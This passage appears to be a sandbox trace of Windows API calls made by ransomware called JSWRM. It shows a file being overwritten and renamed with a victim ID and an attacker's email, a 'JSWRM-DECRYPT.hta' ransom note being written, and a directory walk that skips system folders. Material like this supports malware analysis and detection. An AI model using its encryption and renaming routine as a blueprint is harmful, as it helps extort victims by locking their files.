lpDistanceToMoveHigh=0x0) returned 0x0 [0124.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.828] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.838] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.838] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.839] CloseHandle (hObject=0x338) returned 1 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0124.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0124.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0124.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\PowerViewRes.ms.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\powerviewres.ms.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\PowerViewRes.ms.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\powerviewres.ms.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0124.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0124.841] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15ab259c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15ab259c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ad884b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e046, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ms.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.841] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0124.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.882] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15a3fea8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0124.882] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0124.882] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="...") returned 1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="windows") returned -1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="recovery") returned -1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="perflogs") returned -1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="documents and settings") returned 1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="$RECYCLE.BIN") returned 1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="system volume information") returned -1 [0124.883] lstrcmpiW (lpString1="nl", lpString2="msocache") returned 1 [0124.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0124.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0124.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0124.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0124.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\jswrm-decrypt.hta")) returned 0xffffffff [0124.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0124.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0124.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0124.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.886] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.887] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.888] CloseHandle (hObject=0x314) returned 1 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\nl\\jswrm-decrypt.hta")) returned 0x20 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0124.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0124.888] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\nl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4118982c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0124.888] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.888] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4118982c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.888] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.888] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.888] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4d48116, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4d48116, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ab259c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc46b8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.888] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.888] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.888] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.888] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.888] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.889] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.889] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.889] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.889] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.889] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0124.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0124.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.890] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4118982c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4118982c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4118982c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.890] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0124.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0124.890] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x718b80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x718b80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.890] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.891] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.891] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x718b80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x718b80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.891] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0124.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 